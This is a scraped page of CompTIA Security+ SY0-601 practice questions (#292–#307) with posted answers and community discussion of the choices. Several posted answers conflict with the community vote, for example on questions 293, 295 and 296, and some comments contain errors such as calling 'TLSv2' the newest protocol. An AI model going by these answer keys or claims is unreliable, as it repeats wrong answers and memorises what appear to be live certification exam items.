Software as a service (SaaS) is a type of cloud computing in which an organization uses a software application that is hosted and maintained by
a third-party provider. The organization accesses the application over the internet, typically through a web browser, and does not need to install
or maintain the software on their own servers or devices.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: B
Software as a Service (SAAS)
- On demand software
- No local installation
- Central management of data and application
- SAAS : vendor is responsible maintenance of apps, development of service
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
When an organization utilizes a ready-to-use application from a cloud provider, it is using Software as a Service (SaaS). SaaS providers offer
applications that are pre-built and ready for use by customers. Customers can access these applications over the internet, typically through a
web browser, and pay only for the services they use. SaaS applications are often fully managed and maintained by the provider, so customers do
not need to worry about installing, configuring, or maintaining the applications themselves. In contrast, Infrastructure as a Service (IaaS), Platform
as a Service (PaaS), and Anything as a Service (XaaS) providers offer more generic services, such as storage, computing, or networking
resources, that customers can use to build and deploy their own applications.
upvoted 1 times

  JSOG 2 months ago


Selected Answer: B
correct ans is B
upvoted 1 times

  zaac22 2 months ago


B: SaaS - totally managed by cloud provider, ready to use by customer
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 486/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #292 Topic 1

Which of the following BEST helps to demonstrate integrity during a forensic investigation?

A. Event logs

B. Encryption

C. Hashing

D. Snapshots

Correct Answer: C

Community vote distribution


C (100%)

  sauna28 1 month, 3 weeks ago


Selected Answer: C
Hahshing = Checksum = Integrity
upvoted 2 times

  Done461 2 months ago


Selected Answer: C
Hashing using checksum
upvoted 1 times

  HL2020 2 months ago


Selected Answer: C
Hashing provides integrity. C
upvoted 1 times

  JSOG 2 months ago


Selected Answer: C
agree with C
upvoted 1 times

  zaac22 2 months ago


C: hashing = integrity
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 487/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #293 Topic 1

Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?

A. Machine learning

B. DNS sinkhole

C. Blocklist

D. Honeypot

Correct Answer: C

Community vote distribution


B (100%)

  Lv2023 Highly Voted  2 months ago


Selected Answer: B
The question states that the attack is happening, DNS Sink hole is a disruption technique that can be used to disrupt malware transmission at
the very point of connection. Moreover, it can route suspect traffic to a different network, such as a honeynet, where it can be analyzed. See the
following link: https://resources.infosecinstitute.com/topic/dns-sinkhole-can-protect-malware/
upvoted 10 times

  Alizadeh Most Recent  1 month, 1 week ago


Selected Answer: B
A DNS sinkhole, also known as a DNS blackhole, is a security measure that involves redirecting traffic from malicious domains to a
predetermined location, such as a "blackhole" server that is not connected to the internet. DNS sinkholing can be an effective way to contain a
rapidly spreading attack that is affecting a large number of organizations. By redirecting traffic away from the malicious domains, it is possible to
prevent the attack from spreading and mitigate the impact on the affected organizations.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
A DNS sinkhole would be the most effective option to contain a rapidly spreading attack that is affecting a large number of organizations. A DNS
sinkhole is a type of security measure that involves redirecting traffic from malicious domains to a controlled environment, such as a "sinkhole"
server. This can help to prevent the spread of the attack by blocking access to the malicious domains and preventing users from inadvertently
accessing them.
upvoted 2 times

  GetBuckets 1 month, 3 weeks ago


That’s B.

Quote from Ian Neil’s book:

“DNS Sinkhole: A DNS Blacklist can be created on a firewall so that it can identify malicious traffic trying to gain access to your network. A DNS
sinkhole can be created so that it either returns false information to the attacker or forwards the malicious traffic to a honeypot or honeynet,
thereby protecting your network against an attack.”
upvoted 1 times

  zaac22 2 months ago


B. DNS Sink hole
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 488/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #294 Topic 1

A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the
administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago


1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy

Which of the following is the router experiencing?

A. DDoS attack

B. Memory leak

C. Buffer overflow

D. Resource exhaustion

Correct Answer: D

Community vote distribution


D (100%)

  FMMIR Highly Voted  1 month, 3 weeks ago


Selected Answer: D
The router is experiencing a resource exhaustion issue. The output from the command indicates that the CPU is consistently busy, with a 1-
second average of 99 percent busy and a 1-minute average of 83 percent busy. This indicates that the router is struggling to keep up with the
demands placed on it, potentially due to a high volume of traffic or other factors. As a result, web pages are experiencing long load times. This is
an example of resource exhaustion, where the router's resources are being overwhelmed and are unable to meet the demands placed on them. A
DDoS attack, memory leak, or buffer overflow would not typically cause the symptoms described in the scenario.
upvoted 5 times

  [Removed] Most Recent  1 month, 3 weeks ago


Selected Answer: D
I believe it’s D. If you pay attention it says CPU 0% 300 secs ago… Again! 300 SECS AGOOO… But in the average seconds after that it stating
that is busy at 99, 97 and 83. Which brings me to the conclusion that is resource exhaustion. That is an example of Denial of Service attack
(DoS).
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Not DDoS!! Just DoS… That’s why is D…
upvoted 1 times

  Blueteam 2 months ago


The correct answer is B: Memory Leak
The router is not busy so there is no consumption of the memory however it can't release the memory blocks. This is a memory leak issue.
upvoted 2 times

  Sandon 1 week, 1 day ago


The question does not mention memory, therefore B. Memory Leak is wrong.
upvoted 1 times

  Done461 2 months ago


nope resource exhaustion is the correct as per of the question CPU is @0 % therefore its resource exhustion
upvoted 1 times

  Blueteam 1 month, 4 weeks ago


CPU is at 0% it means CPU is available. CPU at 100% means CPU is fully occupied.
Here CPU is not busy. This is not exhaustion. It means that memory blocks can't release the previously stored data. So it is memory leak.
A memory leak occurs when a process allocates memory from the paged or nonpaged pools, but doesn't free the memory. As a result,
these limited pools of memory are depleted over time, causing Windows to slow down. If memory is completely depleted, failures may
result.
upvoted 2 times

  Sandon 1 month, 3 weeks ago


Negative Ghost Rider
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 489/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  JSOG 2 months ago


Selected Answer: D
Resource exhaustion attacks are computer security exploits that crash, hang, or otherwise interfere with the targeted program or system. They
are a form of denial-of-service attack but are different from distributed denial-of-service attacks, which involve overwhelming a network host such
as a web server with requests from many locations.
upvoted 2 times

Question #295 Topic 1

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business
hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and
work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer
(CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to
mitigate the CEO's concerns? (Choose two.)

A. Geolocation

B. Time-of-day restrictions

C. Certificates

D. Tokens

E. Geotagging

F. Role-based access controls

Correct Answer: CE

Community vote distribution


AB (100%)

  560exam Highly Voted  2 months ago


Selected Answer: AB
The correct answer is AB imo.
Geolocation , Time of day restriction.
upvoted 6 times

  zaac22 2 months ago


I agree with AB
upvoted 1 times

  ZDW Most Recent  1 week, 3 days ago


I would like to clarify for Madmax's answer; time-of-day restrictions would not prevent someone from a different time zone from working on the
system, it would simply require them to adjust their hours accordingly. It does however prevent someone from working on holidays as the
question mentions
upvoted 2 times

  madmax1984 2 weeks, 2 days ago


Selected Answer: AB
A & B because Geolocation reveals more specific data relating to their location, such as their current city or state. Time of Day to prevents
someone in a another time zone to perform outsourced work. Geotagging labels your location for purpose of adding geographical details to a
photo, a video, or any media in the form of metadata.
upvoted 2 times

  Done461 2 months ago


Selected Answer: AB
AB Is the correct answer
upvoted 1 times

  FMMIR 2 months ago


Selected Answer: AB
AB are correct
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 490/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #296 Topic 1

While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar.gz extension. Closer examination
of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users
all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

A. A RAT was installed and is transferring additional exploit tools.

B. The workstations are beaconing to a command-and-control server.

C. A logic bomb was executed and is responsible for the data transfers.

D. A fileless virus is spreading in the local network environment

Correct Answer: D

Community vote distribution


A (80%) C (20%)

  560exam Highly Voted  2 months ago


Selected Answer: A
Going with A on this one. it makes the most sense to me.
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are sent to the target as an email attachment. Once
the attacker compromises the host's system, they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
upvoted 7 times

  sauna28 Most Recent  1 month, 3 weeks ago


Selected Answer: C
I'd go for Logic Bomb, because its about timing hence C is the answer form my POV. A logic bomb is malicous code that waits for the right time
or the right opportunity to strike.
upvoted 2 times

  GetBuckets 1 month, 3 weeks ago


I’d go A as well. Makes more sense.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
It is most likely that a Remote Access Trojan (RAT) was installed and is transferring additional exploit tools. RATs are malicious programs that
allow an attacker to remotely control a computer and access its files and data. In this scenario, the end users clicked on a malicious link in an
email, which likely installed a RAT on their machines. The RAT is now downloading additional exploit tools, which are typically used to
compromise other systems or steal sensitive information. This is the most likely explanation for the sudden appearance of .tar.gz files on the end
users' machines.
upvoted 1 times

  Lv2023 1 month, 3 weeks ago


Going with C logic bomb. The scenario states that the users did not initiate any downloads. It goes on to state further investigation shows that all
users clicked on an external mail which had an infected file a week prior. Here is what the Comptia Study guide has to say about logic bomb:
Some types of malware do not trigger automatically. Having infected a system, they wait for a pre-configured time or date (time bomb) or a
system or user event (logic bomb). A logic bomb isn't necessarily malicious code but could be an event that triggers an undesirable event.
upvoted 3 times

  560exam 2 months ago


Going with A on this one. it makes the most sense to me.
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are sent to the target as an email attachment. Once
the attacker compromises the host's system, they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 491/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #297 Topic 1

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking.
Which of the following cloud service provider types should the business engage?

A. IaaS

B. PaaS

C. XaaS

D. SaaS

Correct Answer: A

Community vote distribution


A (54%) C (46%)

  ronniehaang 3 days, 22 hours ago


Selected Answer: A
A. IaaS (Infrastructure-as-a-Service) is the best option for a business looking for a cloud service provider that offers a la carte services including
cloud backups, VM elasticity, and secure networking. IaaS provides a full range of infrastructure resources such as computing, storage, and
networking, as well as other essential services like security and data protection. The business has the flexibility to select only the services it
requires, allowing for a customized and cost-effective solution.
upvoted 1 times

  madmax1984 2 weeks, 2 days ago


Selected Answer: C
Going with C. Question did hint secure networking and anything with security falls into XaaS.
upvoted 1 times

  PraygeForPass 2 weeks, 5 days ago


Selected Answer: C
Shouldn't this be XaaS?
Since they want any service instead of getting a specific package like SaaS/PaaS/IaaS
A la carte is definitely the keyword here
upvoted 2 times

  Renfri 1 month, 3 weeks ago


Selected Answer: C
"A la carte" service means you can get any service you want from what the provider offers. XaaS :)
upvoted 3 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
IAAS or HAAS – Outsource your equipment BUT you are still responsible for the management and security.
Although data is in that IAAS clout BUT IT IS MORE ON YOUR CONTROL.
Eg IAAS :A good example of infrastructure as a service might be a web service provider that gives you a server but nothing else. You still have to
load the operating system and the applications that are running on that operating system. And then you pay the web service provider a certain
amount a month to be able to have that system running in the cloud
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The best cloud service provider type for a business that is looking for a la carte services including cloud backups, VM elasticity, and secure
networking is Infrastructure as a Service (IaaS). IaaS providers offer a wide range of services, including storage, networking, and computing
resources, that can be customized and scaled to meet the specific needs of a business. This allows businesses to select the specific services
they need, such as cloud backups and secure networking, and pay only for the services they use. In contrast, Platform as a Service (PaaS) and
Software as a Service (SaaS) providers offer more limited sets of services and do not typically allow for the same level of customization and
control as IaaS providers. XaaS, or Anything as a Service, is a broad term that encompasses many different types of cloud services, including
IaaS, PaaS, and SaaS, so it is not a specific type of provider.
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


That’s A. Infrastructure as a Service. The moment your hear networking provided by the cloud provider, that’s IaaS. Networking, servers and
storage belong to the infrastructure.
upvoted 1 times

  nunulong 1 month, 4 weeks ago


Selected Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 492/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Since the question mentioned the business is looking for la carte service including cloud backups, VM elasticity, and secure networking. IaaS
would be the most flexible option the company could choose to configure those services with full customization to reduce the cost and avoid
unused services the company still has to pay for. I would go with IaaS.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 493/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #298 Topic 1

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The
researchers collaborate with other machines using port 445 and on the Internet using port 443. The unauthorized software is starting to be seen
on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed
to resolve the problem as quickly as possible while causing minimal disruption to the researchers. Which of the following contains the BEST
course of action in this scenario?

A. Update the host firewalls to block outbound SMB.

B. Place the machines with the unapproved software in containment.

C. Place the unauthorized application in a blocklist.

D. Implement a content filter to block the unauthorized software communication.

Correct Answer: A

Community vote distribution


C (52%) B (48%)

  HL2020 Highly Voted  1 month, 4 weeks ago


Selected Answer: C
I'm guessing C. A isn't correct since we're asked not to disrupt researchers who are using SMB. B would again disrupt and D doesn't really make
sense.
upvoted 5 times

  Ranaer Most Recent  2 days, 22 hours ago


Selected Answer: B
I think B is the most appropriate action to be taken here. Everyone seems to be latching to the idea of "minimal disruption". Minimal doesnt mean
no disruption. Yeah, some people's workstations wont be accesible or working for some time, but it would instantly prevent the spread and allow
for quick eradication and restoration to last known good backup.
upvoted 1 times

  ronniehaang 3 days, 22 hours ago


Selected Answer: B
B. Place the machines with the unapproved software in containment.

Containing the machines with the unapproved software would minimize the spread of the software to other machines and prevent any potential
harm it might cause to the network. Containment can be achieved by disconnecting the affected machines from the network, either physically or
by modifying firewall rules, until the source of the software can be identified and a plan can be developed to remove it. This will also allow the
security team to perform an analysis on the unauthorized software and assess the potential harm it could cause to the network and data. By
containing the affected machines, the security team can minimize disruption to the researchers while resolving the issue as quickly as possible.
upvoted 1 times

  madmax1984 2 weeks, 2 days ago


Selected Answer: C
Its C as the question states "The security team has been instructed to resolve the problem as quickly as possible while causing minimal
disruption to the researchers."
upvoted 2 times

  RvR109 3 weeks ago


Selected Answer: B
B. Place the machines with the unapproved software in containment.

Placing the machines with the unauthorized software in containment is the best course of action in this scenario, as it will prevent the software
from communicating with other machines in the lab and on the Internet, while minimizing disruption to the researchers. This can be done by
disconnecting the affected machines from the network, or by using software-based containment solutions that restrict the software's access to
network resources.
upvoted 2 times

  80drag 4 weeks, 1 day ago


The answer will be C, unless the virus is so damaging that it's gonna cause the company lots of money. Only then would you containment the
device.

The best resolution is just to add it to the blocklist currently. Then during the company's down time when the researchers are not working you
would then solve the issue.
Think of viruses in work world as Low and High severity on impact.

B would only ever be used if the machines had a ransomeware, cryptomalware, Trojans, etc. Anything that would cause mid to high impact would

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 494/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

be containment.

For our situation this is effecting a few devices and is not causing huge amounts of damage currently for this reason we but it on the block this to
stop it currently.
upvoted 2 times

  80drag 4 weeks, 1 day ago


For our situation this is effecting a few devices and is not causing huge amounts of damage currently for this reason we but it on the block
"List" to stop it currently.
upvoted 1 times

  80drag 4 weeks, 1 day ago


Also another reason why this is B "minimal disruption to the researchers. "

This is the key hint in the question, containment devices will cause HUGE disruptions for the researchers
upvoted 2 times

  80drag 4 weeks, 1 day ago


Sry I ment "Also another reason why this is C"
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
Whitelisting is better than blocklist. Having containment will isolate infected machines and prevent the spread
upvoted 1 times

  Alizadeh 1 month, 2 weeks ago


Selected Answer: B
In this scenario, the best course of action would be to place the machines with the unauthorized software in containment.

Containment involves isolating the affected machines from the rest of the network in order to prevent the unauthorized software from spreading
to other machines. This can be done by physically disconnecting the affected machines from the network, or by using virtual LANs (VLANs) or
other network segmentation techniques to create a separate network for the affected machines.
upvoted 1 times

  kholdsnare 1 month, 3 weeks ago


Selected Answer: C
B would be the answer if "while causing minimal disruption to the researchers" wasn't part of the question.
C is the only choice that makes sense under these conditions
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best course of action in this scenario would be to place the machines with the unauthorized software in containment. This will prevent the
software from spreading to other machines and causing further disruption. Additionally, the security team can investigate the source of the
software and take steps to remove it from the affected machines. This will minimize disruption to the researchers and help to prevent the problem
from spreading. Options A, C, and D may also be effective in certain cases, but placing the affected machines in containment is likely the most
effective solution in this scenario.
upvoted 3 times

  GetBuckets 1 month, 3 weeks ago


Yep. That’s C. See HL2020 notes down below.
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: C
C makes the most sense
upvoted 4 times

  sterfryy 1 month, 3 weeks ago


Selected Answer: B
The best course of action in this scenario is to place the machines with the unauthorized software in containment. This will prevent the software
from spreading to other machines or communicating with external systems, reducing the risk of further damage or disruption. The security team
can then investigate the machines in containment and take appropriate action to remove the unauthorized software and secure the affected
machines. Blocking outbound SMB or implementing a content filter may help to prevent the spread of the unauthorized software, but they may
also disrupt the researchers' work and should be used as a last resort.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 495/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #299 Topic 1

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support
the analyst's review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A. Security research publications

B. The MITRE ATT&CK framework

C. The Diamond Model of Intrusion Analysis

D. The Cyber Kill Chain

Correct Answer: B

Community vote distribution


B (100%)

  FMMIR Highly Voted  2 months ago


Selected Answer: B
The MITRE ATT&CK Framework was created by MITRE in 2013 to document attacker tactics and techniques based on real-world observations.
This index continues to evolve with the threat landscape and has become a renowned knowledge base for the industry to understand attacker
models, methodologies, and mitigation.
upvoted 5 times

  madmax1984 Most Recent  2 weeks, 2 days ago


Selected Answer: B
B is correct.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: B
• MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary
behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding
security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected
upvoted 1 times

  sauna28 1 month, 3 weeks ago


The Diamond Model of Intrusion Analysis is a model to describe cyber attacks. It contains 4 parts - adversary, infrastructure, capability, and
target. It gives analysts a comprehensive view of cyber attacks.
Adversary: Where are attackers from? Who are the attackers? Who is the sponsor? Why attack? What is the activity timeline and planning?
Infrastructure: Infected computer(s), C2 domain names, location of C2 servers, C2 server types, mechanism and structure of C2, data
management & control, and data leakage paths
Capability: What skills do the attackers have to do reconnaissance, deliver their attacks, attack exploits and vulnerabilities, deploy their remote-
controlled malwares and backdoors, and develop their tools.
Target: Who is their target country/region, industry sector, individual, or data
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 496/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #300 Topic 1

A security analyst is hardening a network infrastructure. The analyst is given the following requirements:

• Preserve the use of public IP addresses assigned to equipment on the core router.
• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Choose two.)

A. Configure VLANs on the core router.

B. Configure NAT on the core router.

C. Configure BGP on the core router.

D. Enable AES encryption on the web server.

E. Enable 3DES encryption on the web server.

F. Enable TLSv2 encryption on the web server.

Correct Answer: BF

Community vote distribution


BF (64%) CF (36%)

  madmax1984 2 weeks, 2 days ago


Selected Answer: BF
B and F is correct.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: CF
To meet the requirements, the analyst should configure BGP on the core router (choice C) and enable TLSv2 encryption on the web server
(choice F).

BGP, or Border Gateway Protocol, is a routing protocol that is used to exchange routing and reachability information among autonomous
systems on the Internet. It is typically used on the core routers of a network infrastructure to ensure that traffic is routed efficiently and securely.
By configuring BGP on the core router, the analyst can ensure that the public IP addresses assigned to equipment on the router are preserved
and that traffic is routed securely.

TLS, or Transport Layer Security, is a cryptographic protocol that provides secure communication over the Internet. TLSv2 is the most recent
version of the protocol and offers the strongest encryption ciphers available. By enabling TLSv2 on the web server, the analyst can ensure that "in
transport" encryption protection is provided to the server with the strongest ciphers available.
upvoted 4 times

  okay123 1 month, 3 weeks ago


Selected Answer: BF
its B and F
upvoted 3 times

  Mindlos 2 months ago


agree with B,F
upvoted 2 times

  JSOG 2 months ago


Selected Answer: BF
agree with BF
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 497/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #301 Topic 1

A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the
following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack.

B. An attacker was able to bypass application whitelisting by emailing a spreadsheet attachment with an embedded PowerShell in the file.

C. An attacker was able to install malware to the C:\asdf234 folder and use it to gain administrator rights and launch Outlook.

D. An attacker was able to phish user credentials successfully from an Outlook user profile

Correct Answer: B

Community vote distribution


B (100%)

  viksap 1 month, 2 weeks ago


What about the logs showing going from PC1 TO PC2
upvoted 2 times

  Ranaer 2 days, 21 hours ago


While there have been attempts to login on PC2, we dont have evidence to be anything related to pass the hash, so I think its safe to assume
this isnt the correct answer.
upvoted 1 times

  JSOG 2 months ago


Selected Answer: B
agree with B as powershell was the only injection that worked
upvoted 3 times

  [Removed] 1 month, 4 weeks ago


Where is the spreadsheet attachment according to the diagram and the B answer that you selected?
upvoted 2 times

  Blueteam 1 month, 4 weeks ago


The first event says that .exe file was blocked.
The second event says that PowerShell process started and initiated by outlook.
So an email attachment is most likely the case. Among all available options B is talking about attachment. It is not known that is
Spreadsheet but it is the only correct option.
upvoted 2 times

  Nirmalabhi 1 week, 5 days ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 498/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

excellent crack. Thanks Mate


upvoted 1 times

Question #302 Topic 1

A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords
are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network.

B. Implement salting and hashing.

C. Configure the web content filter to block access to the forum.

D. Increase password complexity requirements.

Correct Answer: B

Community vote distribution


B (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
To mitigate the damage done by this type of data exfiltration in the future, the analyst should implement salting and hashing (choice B).

Salting and hashing are techniques used to protect the security of passwords stored in a database. Salting involves adding random data, known
as a "salt," to each password before it is hashed. This makes it more difficult for attackers to crack the passwords by using pre-computed hash
tables, known as "rainbow tables." Hashing involves applying a one-way mathematical function, known as a "hash algorithm," to the salted
password to produce a fixed-length output, known as a "hash value." This makes it impossible to determine the original password from the hash
value, even if the attacker has access to the database. By implementing salting and hashing, the company can ensure that its passwords are
protected even if the database is compromised
upvoted 2 times

  Lv2023 1 month, 3 weeks ago


Agree with B on this one
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


Yep. B is the best answer here.
upvoted 1 times

  HL2020 1 month, 4 weeks ago


Selected Answer: B
Key phrase is "mitigate damage done". You salt and hash in case the db gets out.
upvoted 2 times

  Blueteam 2 months ago


Correct answer is B:
Username and password shouldn't be stored as plain text.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 499/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #303 Topic 1

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and
date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing

B. Whaling

C. Phishing

D. Vishing

Correct Answer: C

Community vote distribution


C (100%)

  sauna28 1 month, 3 weeks ago


Selected Answer: C
Id go for C, a common Phising because, SPEAR PHISHING IS TARGETING VERY SPECIFIC PERSON/ GROUP OF PEOPLE
upvoted 2 times

  JSOG 2 months ago


Selected Answer: C
this is just a common phishing by method of elimination
upvoted 3 times

Question #304 Topic 1

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an
assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the
analyst disable to enhance the access point security?

A. WPA3

B. AES

C. RADIUS

D. WPS

Correct Answer: D

Community vote distribution


D (100%)

  JSOG Highly Voted  2 months ago


Selected Answer: D
agree with D
upvoted 5 times

  sauna28 Most Recent  1 month, 3 weeks ago


Selected Answer: D
Wifi Protected Setup - Even though WPS offers this convenience, it is appallingly insecure. Wireless networks with WPS enabled are highly
vulnerable to cybersecurity threats. Attackers can easily target the WPS function to steal network passwords, regardless of how complex the
password is.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 500/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #305 Topic 1

Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP

B. MITRE ATT&CK

C. Cyber Kill Chain

D. SDLC

Correct Answer: A

Community vote distribution


A (100%)

  sauna28 1 month, 3 weeks ago


Selected Answer: A
Anything related to WEB APPLICATION SECURITY = OWASP
The Open Web Application Security Project (FRAMEWORK) is an online community that produces freely-available articles, methodologies,
documentation, tools, and technologies in the field of web application security. The Open Web Application Security Project provides free and
open resources.
• MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary
behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding
security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The correct answer is A. OWASP (Open Web Application Security Project). OWASP is a non-profit organization that provides a comprehensive list
of the most common web application vulnerabilities and offers recommendations for addressing them. MITRE ATT&CK is a framework for
tracking and analyzing the tactics, techniques, and procedures used by attackers, while Cyber Kill Chain is a methodology for identifying and
disrupting an attacker's activities. SDLC (Software Development Life Cycle) is a systematic approach to developing software.
upvoted 2 times

  Blueteam 2 months ago


A is the most specific answer.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 501/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #306 Topic 1

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the
section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are
unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas
of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them.
Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.

B. The signal on the WAP needs to be increased in that section of the building.

C. The certificates have expired on the devices and need to be reinstalled.

D. The users in that section of the building are on a VLAN that is being blocked by the firewall

Correct Answer: A

Community vote distribution


A (100%)

  Blueteam Highly Voted  2 months ago


A is correct. Typical evil twin.
upvoted 5 times

  FMMIR Most Recent  1 month, 3 weeks ago


Selected Answer: A
The most likely cause of this issue is an external access point engaging in an evil-twin attack (choice A).

An evil-twin attack is a type of wireless network security attack in which an attacker sets up a fake wireless access point (WAP) that has the same
name and security settings as a legitimate WAP. When users attempt to connect to the legitimate WAP, they may unknowingly connect to the fake
WAP instead, which allows the attacker to intercept and potentially modify their network traffic. This type of attack is particularly likely to be
successful in areas where there are multiple WAPs, such as in the section of the building closest to the parking lot, where users may be returning
to their desks after using their devices elsewhere in the building. The intermittent slow speeds and inability to connect to network drives, as well
as the reports of users being required to re-enter their credentials on web pages, are all symptoms of an evil-twin attack.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 502/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #307 Topic 1

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator
MOST likely use to confirm the suspicions?

A. Nmap

B. Wireshark

C. Autopsy

D. DNSEnum

Correct Answer: A

Community vote distribution


A (92%) 8%

  dfbdfb Highly Voted  1 month ago


Goodluck guys! I passed yesterday after reviewing here. Figured I'd come back for an update since others haven't. I'd say 50-60%+ of my
questions came from here, but a lot of those were ones without clear answers (ex, questions with multiple answers at or near 50/50). This guide is
more of a study sheet vs an answer key. Dont go with the admin selected answer and USE THE DISCUSSIONS as well as some external material
to find the correct answers. Pay attention to PBQ's! I had 4 and 3/4 came from here.
upvoted 7 times

  Sandon Most Recent  1 week ago


Selected Answer: A
